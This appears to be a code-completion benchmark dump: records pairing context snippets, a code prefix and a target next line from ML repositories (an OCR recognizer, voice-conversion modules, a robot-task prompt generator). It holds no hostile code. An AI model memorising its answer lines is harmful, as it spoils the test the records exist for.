user_contents[-1]})\n\n openai.api_key = os.environ[\"OPENAI_API_KEY\"]\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature\n )\n\n result = ''\n for choice in response.choices: \n result += choice.message.content \n\n end = time.time()\n used_time = end - start\n\n print(result)\n if save_path is not None:\n with open(save_path, \"w\") as f:\n json.dump({\"used_time\": used_time, \"res\": result, \"system\": system, \"user\": user_contents, \"assistant\": assistant_contents}, f, indent=4)\n\n return result"
}
] | import numpy as np
import copy
import time, datetime
import os
import json
from objaverse_utils.utils import partnet_mobility_dict
from gpt_4.prompts.utils import build_task_given_text, parse_task_response
from gpt_4.query import query | 3,491 |
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
# send the object articulation tree, semantics file and get task descriptions, invovled objects and joints
# randomly sample an object for generation.
|
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
# send the object articulation tree, semantics file and get task descriptions, invovled objects and joints
# randomly sample an object for generation.
| object_cetegories = list(partnet_mobility_dict.keys()) | 0 | 2023-10-31 19:44:09+00:00 | 4k |
junhoyeo/BetterOCR | betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/recognition.py | [
{
"identifier": "Model",
"path": "betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/model.py",
"snippet": "class Model(nn.Module):\n def __init__(self, opt2val: dict):\n super(Model, self).__init__()\n\n input_channel = opt2val[\"input_channel\"]\n output_channel = opt2val[\"output_channel\"]\n hidden_size = opt2val[\"hidden_size\"]\n vocab_size = opt2val[\"vocab_size\"]\n num_fiducial = opt2val[\"num_fiducial\"]\n imgH = opt2val[\"imgH\"]\n imgW = opt2val[\"imgW\"]\n FeatureExtraction = opt2val[\"FeatureExtraction\"]\n Transformation = opt2val[\"Transformation\"]\n SequenceModeling = opt2val[\"SequenceModeling\"]\n Prediction = opt2val[\"Prediction\"]\n\n # Transformation\n if Transformation == \"TPS\":\n self.Transformation = TpsSpatialTransformerNetwork(\n F=num_fiducial,\n I_size=(imgH, imgW),\n I_r_size=(imgH, imgW),\n I_channel_num=input_channel,\n )\n else:\n print(\"No Transformation module specified\")\n\n # FeatureExtraction\n if FeatureExtraction == \"VGG\":\n extractor = VGGFeatureExtractor\n else: # ResNet\n extractor = ResNetFeatureExtractor\n self.FeatureExtraction = extractor(\n input_channel,\n output_channel,\n opt2val,\n )\n self.FeatureExtraction_output = output_channel # int(imgH/16-1) * 512\n self.AdaptiveAvgPool = nn.AdaptiveAvgPool2d(\n (None, 1)\n ) # Transform final (imgH/16-1) -> 1\n\n # Sequence modeling\n if SequenceModeling == \"BiLSTM\":\n self.SequenceModeling = nn.Sequential(\n BidirectionalLSTM(\n self.FeatureExtraction_output,\n hidden_size,\n hidden_size,\n ),\n BidirectionalLSTM(hidden_size, hidden_size, hidden_size),\n )\n self.SequenceModeling_output = hidden_size\n else:\n print(\"No SequenceModeling module specified\")\n self.SequenceModeling_output = self.FeatureExtraction_output\n\n # Prediction\n if Prediction == \"CTC\":\n self.Prediction = nn.Linear(\n self.SequenceModeling_output,\n vocab_size,\n )\n elif Prediction == \"Attn\":\n self.Prediction = Attention(\n self.SequenceModeling_output,\n hidden_size,\n vocab_size,\n )\n elif Prediction == \"Transformer\": # TODO\n pass\n else:\n raise Exception(\"Prediction is neither CTC or Attn\")\n\n def forward(self, x: Tensor):\n \"\"\"\n :param x: (batch, input_channel, height, width)\n :return:\n \"\"\"\n # Transformation stage\n x = self.Transformation(x)\n\n # Feature extraction stage\n visual_feature = self.FeatureExtraction(x) # (b, output_channel=512, h=3, w)\n visual_feature = self.AdaptiveAvgPool(\n visual_feature.permute(0, 3, 1, 2)\n ) # (b, w, channel=512, h=1)\n visual_feature = visual_feature.squeeze(3) # (b, w, channel=512)\n\n # Sequence modeling stage\n self.SequenceModeling.eval()\n contextual_feature = self.SequenceModeling(visual_feature)\n\n # Prediction stage\n prediction = self.Prediction(\n contextual_feature.contiguous()\n ) # (b, T, num_classes)\n\n return prediction"
},
{
"identifier": "CTCLabelConverter",
"path": "betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/utils.py",
"snippet": "class CTCLabelConverter(object):\n \"\"\"Convert between text-label and text-index\"\"\"\n\n def __init__(self, vocab: list):\n self.char2idx = {char: idx for idx, char in enumerate(vocab)}\n self.idx2char = {idx: char for idx, char in enumerate(vocab)}\n self.ignored_index = 0\n self.vocab = vocab\n\n def encode(self, texts: list):\n \"\"\"\n Convert input texts into indices\n texts (list): text labels of each image. [batch_size]\n\n Returns\n text: concatenated text index for CTCLoss.\n [sum(text_lengths)] = [text_index_0 + text_index_1 + ... + text_index_(n - 1)]\n length: length of each text. [batch_size]\n \"\"\"\n lengths = [len(text) for text in texts]\n concatenated_text = \"\".join(texts)\n indices = [self.char2idx[char] for char in concatenated_text]\n\n return torch.IntTensor(indices), torch.IntTensor(lengths)\n\n def decode_greedy(self, indices: Tensor, lengths: Tensor):\n \"\"\"convert text-index into text-label.\n\n :param indices (1D int32 Tensor): [N*length,]\n :param lengths (1D int32 Tensor): [N,]\n :return:\n \"\"\"\n texts = []\n index = 0\n for length in lengths:\n text = indices[index : index + length]\n\n chars = []\n for i in range(length):\n if (text[i] != self.ignored_index) and (\n not (i > 0 and text[i - 1] == text[i])\n ): # removing repeated characters and blank (and separator).\n chars.append(self.idx2char[text[i].item()])\n texts.append(\"\".join(chars))\n index += length\n return texts\n\n def decode_beamsearch(self, mat, lm_model, lm_factor, beam_width: int = 5):\n texts = []\n for i in range(mat.shape[0]):\n text = ctcBeamSearch(\n mat[i],\n self.vocab,\n self.ignored_index,\n lm_model,\n lm_factor,\n beam_width,\n )\n texts.append(text)\n return texts"
}
] | import math
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.data
import torchvision.transforms as transforms
from PIL import Image
from .model import Model
from .utils import CTCLabelConverter
from collections import OrderedDict | 2,747 | def __init__(self, max_size, PAD_type: str = "right"):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probabilty (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer
| """
this code is adapted from https://github.com/black7375/korean_ocr_using_pororo
Apache License 2.0 @yunwoong7
Apache License 2.0 @black7375
"""
"""
This code is adapted from https://github.com/JaidedAI/EasyOCR/blob/8af936ba1b2f3c230968dc1022d0cd3e9ca1efbb/easyocr/recognition.py
"""
def contrast_grey(img):
high = np.percentile(img, 90)
low = np.percentile(img, 10)
return (high - low) / np.maximum(10, high + low), high, low
def adjust_contrast_grey(img, target: float = 0.4):
contrast, high, low = contrast_grey(img)
if contrast < target:
img = img.astype(int)
ratio = 200.0 / np.maximum(10, high - low)
img = (img - low + 25) * ratio
img = np.maximum(
np.full(img.shape, 0),
np.minimum(
np.full(img.shape, 255),
img,
),
).astype(np.uint8)
return img
class NormalizePAD(object):
def __init__(self, max_size, PAD_type: str = "right"):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probabilty (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer | recognizer = Model(opt2val) | 0 | 2023-10-26 11:26:25+00:00 | 4k |
KoeAI/LLVC | minimal_rvc/modules.py | [
{
"identifier": "get_padding",
"path": "minimal_rvc/commons.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size * dilation - dilation) / 2)"
},
{
"identifier": "init_weights",
"path": "minimal_rvc/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "piecewise_rational_quadratic_transform",
"path": "minimal_rvc/transforms.py",
"snippet": "def piecewise_rational_quadratic_transform(\n inputs,\n unnormalized_widths,\n unnormalized_heights,\n unnormalized_derivatives,\n inverse=False,\n tails=None,\n tail_bound=1.0,\n min_bin_width=DEFAULT_MIN_BIN_WIDTH,\n min_bin_height=DEFAULT_MIN_BIN_HEIGHT,\n min_derivative=DEFAULT_MIN_DERIVATIVE,\n):\n if tails is None:\n spline_fn = rational_quadratic_spline\n spline_kwargs = {}\n else:\n spline_fn = unconstrained_rational_quadratic_spline\n spline_kwargs = {\"tails\": tails, \"tail_bound\": tail_bound}\n\n outputs, logabsdet = spline_fn(\n inputs=inputs,\n unnormalized_widths=unnormalized_widths,\n unnormalized_heights=unnormalized_heights,\n unnormalized_derivatives=unnormalized_derivatives,\n inverse=inverse,\n min_bin_width=min_bin_width,\n min_bin_height=min_bin_height,\n min_derivative=min_derivative,\n **spline_kwargs\n )\n return outputs, logabsdet"
}
] | import math
import torch
from torch import nn
from torch.nn import Conv1d
from torch.nn import functional as F
from torch.nn.utils import remove_weight_norm, weight_norm
from . import commons
from .commons import get_padding, init_weights
from .transforms import piecewise_rational_quadratic_transform | 2,261 | dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
)
| # This module is based on code from ddPn08, liujing04, and teftef6220
# https://github.com/ddPn08/rvc-webui
# https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI
# https://github.com/teftef6220/Voice_Separation_and_Selection
# These modules are licensed under the MIT License.
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(
self,
in_channels,
hidden_channels,
out_channels,
kernel_size,
n_layers,
p_dropout,
):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(
nn.Conv1d(
in_channels, hidden_channels, kernel_size, padding=kernel_size // 2
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout))
for _ in range(n_layers - 1):
self.conv_layers.append(
nn.Conv1d(
hidden_channels,
hidden_channels,
kernel_size,
padding=kernel_size // 2,
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
Dialted and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size**i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(
nn.Conv1d(
channels,
channels,
kernel_size,
groups=channels,
dilation=dilation,
padding=padding,
)
)
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(
self,
hidden_channels,
kernel_size,
dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
) | self.convs1.apply(init_weights) | 1 | 2023-10-28 01:58:49+00:00 | 4k |
aurelio-labs/semantic-router | semantic_router/layer.py | [
{
"identifier": "BaseEncoder",
"path": "semantic_router/encoders/base.py",
